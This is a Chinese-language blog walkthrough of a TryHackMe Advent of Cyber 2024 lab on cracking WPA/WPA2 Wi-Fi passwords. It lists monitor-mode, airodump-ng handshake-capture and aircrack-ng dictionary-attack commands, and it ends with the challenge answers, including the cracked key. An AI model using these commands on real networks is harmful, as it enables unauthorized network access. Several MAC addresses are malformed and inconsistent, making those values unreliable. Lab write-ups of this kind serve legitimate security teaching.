靶场系列二:Day 11 Walk-through【TryHackMe: Advent of Cyber 2024】

154 阅读3分钟

如果您想使用 WPA,请按星号键!
在今天的挑战中,我们将学习 WPA/WPA2 破解攻击的原理!”

image.png
让我们一起来看看这个故事吧?

image.png

学习目标

  • 了解什么是 Wi-Fi
  • 探讨其对企业的重要性
  • 了解不同的 Wi-Fi 攻击
  • 了解 WPA/WPA2 破解攻击

基本术语

image.png

image.png

1735728948805.jpg

Now let’s get into the real deal

根据提供的详细信息,使用 ssh 登录机器

image.png

ssh glitch@10.10.239.98

1735729088250.jpg 运行下面的命令,查看网络上可用的任何无线设备及其配置:

iw dev

image.png

现在我们可以看到所需的基本信息,设备/接口是 wlan2address(02:00:00:00:00:02:00)和类型(托管),我们将把类型改为监控,以实现我们的目标。

现在,我们要使用 wlan2 设备扫描附近的 Wi-Fi 网络。

sudo iw dev wlan2 scan

image.png现在我们可以看到设备的 BSSID 是 02:00:00:00:00:00:00,SSID 是 MalwareM_AP

现在,让我们将模式设置为监控,以允许 Wi-Fi 接口监听该特定信道上的所有无线流量

sudo ip link set dev wlan2 down
sudo iw dev wlan2 set type monitor
sudo ip link set dev wlan2 up

image.png 现在,如果我们查看接口信息,就会发现它已被设置为监控:

sudo iw dev wlan2 info

image.png 现在,让我们再创建一个 SSH 会话。我们需要有两个独立的终端

image.png在第一个终端上,我们首先捕捉该区域的 Wi-Fi 流量,特别是 WPA 握手数据包。

我们可以使用命令 :

sudo airodump-ng wlan2

image.png这将为我们提供已有的信息,因此我们要捕获接入点的特定网络信道和 MAC 地址(BSSID),并将信息保存到以 output-file 开头的几个文件中,这就是我们稍后要暴破的文件。

还是在第一个终端上,运行下面的命令:

sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2

image.png现在我们收到了客户端信息,注意 STATION 部分显示的设备 BSSID(MAC)为 02:00:00:00:00:01:00,它连接到了接入点。这就是我们要侵入的连接。

接下来,让我们对第二个终端发起去验证入侵:

image.png现在,如果我们回过头来看第一台终端,就会发现输出右上方显示的 WPA 握手信息为 WPA handshake: 02:00:00:00:00:00:00。所有这些信息都已保存到输出文件中。

在第二终端,我们可以使用捕获的 WPA 握手尝试破解 WPA/WP2 口令。我们将执行字典攻击,以便将口令与指定字表文件中的每个条目进行匹配。

下面的命令将为我们完成这项工作:

sudo aircrack-ng -a 2 -b 02:00:00:00:00 -w /home/glitch/rockyou.txt output*cap

image.png现在我们找到了如上图所示的密钥,有了 PSK,我们就可以加入 MalwareM_AP 接入点了。

wpa_passphrase MalwareM_AP fluffy/champ24 > config
sudo wpa_supplicant -B -c config -i wlan2

image.png 注意: the rfkill: Cannot get wiphy information error can be ignore.

现在,让我们再次检查无线接口

image.png就这样--显示我们已加入 MalwareM_AP SSID。

现在让我们回答问题

问题 1:我们无线接口的 BSSID 是什么?

答案 02:00:00:00:02:00

问题 2: 接入点的 SSID 和 BSSID 是什么?格式: SSID、BSSID

答案:MalwareM_AP,02:00:00:00:00:00:00

问题 3: 已经连接到接入点的无线接口的 BSSID 是什么?

答案:02:00:00:00:01:00

问题 4: 执行 WPA 破解攻击后的 PSK 是什么?

答案:fluffy/champ24

如果你喜欢这个挑战,并有兴趣了解更多信息,请随时查看网络模块

有趣吧?第 12 天见